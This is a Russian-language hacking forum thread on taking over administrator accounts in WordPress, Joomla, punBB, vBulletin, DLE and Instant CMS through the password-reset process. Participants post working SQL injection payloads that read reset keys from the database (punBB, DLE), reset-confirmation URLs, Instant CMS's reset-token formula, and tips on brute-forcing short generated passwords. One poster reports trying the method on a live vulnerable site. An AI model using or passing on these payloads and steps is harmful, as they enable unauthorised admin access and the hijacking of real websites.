Авторские статьи Получаем доступ в админку Wordpress без расшифровки хэша

Ааааааа, ну зачем-зачем-зачем ты спалил!!

с 1.7 в базе код восстановления хеширован.

 

ну раз с WP раскрылась тема то и до джумлы доберутся)
вообщем в таблице юзеров есть такая колонка "activation" вней появляются значение захешированое, в моем примере для теста я зарегался на одном из уязвимых сайтов и востонавил пасс, до востановления там был такой хешь "521608068f705c84e225b8bc30e387d6:$1$e47b7a03$"
на почту пришел такой хешь "985255f8d4bbe03c95ec3b144fc43da8" т.е это хешь под хешом что приведен выше, и чтобы его получить прийдется его сбрутить!

форма ввода данного кода: /index.php?option=com_user&view=reset&layout=confirm

 

Так 100 лет можно брутить хэш.

 

раньше открытые были, потом пофиксели с какойто версии.

 

продолжу тему раз уж нато пошло

форум punBB 1.3.4

PHP:

select+substr(concat_ws(0x3a,id,username,email),1,99)+from+forum_users+limit+1,1

получаем

идём на страницу востановления пароля

PHP:

http://сайт.ру/forum/login.php?action=forget

вводим емеил, далее

PHP:

select+substr(concat_ws(0x3a,id,activate_key),1,99)+from+forum_users+limit+1,1

получам

далее меняем пароль

 

Тогда можно переименовать тему, и посвятить ее способам на других CMS.

 

Да можно создать тему

 

может не стоит?) захэшируют же все))

 

переносите тему в ветку уязвимости.

BigBear'у теперь некогда этим заниматься, а тема не должна затеряться.

 

Способ так-же подходит для VB - при восстановлении устанавливается новый 8-ми символьный цифровой пароль, который сбрутить не составит труда, хэши в ссылке на восстановление не используются.

Потом хэш можно вернуть на изначальный, только вот письмо из почты админа никуда не денется, хотя возможно в других двигах есть свои нюансы.

 

Версию не уточнял!
DLE:

1) http://site/?do=lostpassword (via email)
2) use bug:

http://site/script.php?video=-49674'+union+select+1,2,lostid,4,5,6,7+from+dle_lostdb+where+lostname='1'--+

В данном случае, lostname - это ID пользователя - обычно админ


3)переход по линку:
http://site/index.php?do=lostpassword&action=password&douser=1&lostid=a05e0f74df705f0a1e3ab0803f82a7fd046214d5

4) Генерится 11 символьный пароль из loweralpha и digit. Причем, есть шанс, что сгенеренный пароль будет only 11 digit's

P.S Лично у меня 11 lenght DIGIT simblols EGB обходит перебором за пару минут.






Instant CMS v1.9

CСсылка формируется согласно шаблону:

Query -
SELECT *, DATE_FORMAT(logdate, '%d-%m-%Y-%H-%i-%s') as logdate FROM cms_users WHERE email = 'email' LIMIT 1

Непосредственно вычисление хеша:
$usercode = md5($usr['id'] . '-' . $usr['login'] . '-' . $usr['password'] . '-' . $usr['logdate']);


В результате прямой линк на сброс пароля принимает вид:

http://site/registration/remind/bbd4da8d02433a6bdea3d3019458f951

Далее в форме вводим новый пароль:подтверждение.

P.S. В stable что лежит на офф сайте код в алгоритм формирования ссылки в конец добавляется константа PATH ( $_SERVER['DOCUMENT_ROOT'])

Like this:
$usercode = md5($usr['id'] . '-' . $usr['login'] . '-' . $usr['password'] . '-' . $usr['logdate'].PATH);

 

wp 3.4.2. прокатило

 

WP 3.9.1 и выше (может и ниже) - ключ активации хешируется.
20 символов [a-zA-Z0-9] - проще хеш админа подобрать...